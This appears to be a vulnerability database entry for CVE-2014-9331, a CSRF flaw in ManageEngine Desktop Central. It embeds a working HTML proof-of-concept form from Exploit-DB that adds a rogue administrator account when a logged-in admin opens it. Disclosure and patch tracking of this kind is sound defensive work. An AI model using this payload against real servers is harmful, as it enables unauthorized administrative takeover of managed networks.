CVE-2014-9331 : Detail

CVE-2014-9331

Cross-Site Request Forgery - CSRF
A01-Broken Access Control
0.89%V3
Network
2015-02-04
15h00 +00:00
2018-10-09
16h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Cross-site request forgery (CSRF) vulnerability in ZOHO ManageEngine Desktop Central before 9 build 90130 allows remote attackers to hijack the authentication of administrators for requests that add an administrator account via an addUser action to STATE_ID/1417736606982/roleMgmt.do.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-352 Cross-Site Request Forgery (CSRF)
The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 35980

Publication date : 2015-02-02 23h00 +00:00
Author : Mohamed Idris
EDB Verified : No

<html> <!-- # Exploit Title: ManageEngine Desktop Central 9 Add and admin user through Cross-Site Request Forgery (CSRF) # Date: 05 December 2014 # Exploit Author: Mohamed Idris – Help AG Middle East # Vendor Homepage: http://www.manageengine.com/ # Software Link: http://www.manageengine.com/products/desktop-central/ # Version: All versions below build 90121 # Tested on: Version 9 Build 90087 # CVEID: CVE-2014-9331 # Vulnerability Fix: http://www.manageengine.com/products/desktop-central/cve20149331-cross-site-request-forgery.html POC Code: When an authenticated application admin clicks a link to the below code, you well get a user “Hacker” with the password “HackerPass” added to the application (convincing the admin to click on a link is so easy ;)). Remember to change the IP to the target server IP address in the code. --> <!-- CSRF PoC - Add an admin account --> <body> <form action="http://<Server-IP>:8020/STATE_ID/1417736606982/roleMgmt.do?actionToCall=addUser&SUBREQUEST=XMLHTTP" method="POST"> <input type="hidden" name="AuthenticationType" value="DC" /> <input type="hidden" name="newDCAuthUserName" value="Hacker" /> <input type="hidden" name="newDCAuthUserPassword" value="HackerPass" /> <input type="hidden" name="DCAuthconfirmPassword" value="HackerPass" /> <input type="hidden" name="newDCAuthUserEmail" value="" /> <input type="hidden" name="newDCAuthUserPNumber" value="" /> <input type="hidden" name="newADAuthUserEmail" value="" /> <input type="hidden" name="newADAuthUserPNumber" value="" /> <input type="hidden" name="MapType" value="ALL" /> <input type="hidden" name="aduserSearch" value="" /> <input type="hidden" name="searchValue" value="Search" /> <input type="hidden" name="aduserSearchRO" value="" /> <input type="hidden" name="searchValue" value="Search" /> <input type="hidden" name="action1" value="DC_ADD_USER" /> <input type="hidden" name="addUser" value="Add User" /> <input type="hidden" name="cancle" value="Cancel" /> <input type="hidden" name="customerids" value="" /> <input type="hidden" name="roleListDCAuth" value="1" /> <input type="hidden" name="PERSONALISE_LANGUAGE" value="en_US" /> <input type="hidden" name="domainListADAuth" value="-1" /> <input type="hidden" name="roleListADAuth" value="-1" /> <input type="hidden" name="PERSONALISE_LANGUAGE" value="en_US" /> <input type="submit" value="Submit request" /> </form> </body> </html>

Products Mentioned

Configuraton 0

Zohocorp>>Manageengine_desktop_central >> Version To (including) 9.0

References

http://www.securityfocus.com/bid/72464
Tags : vdb-entry, x_refsource_BID
http://www.exploit-db.com/exploits/35980
Tags : exploit, x_refsource_EXPLOIT-DB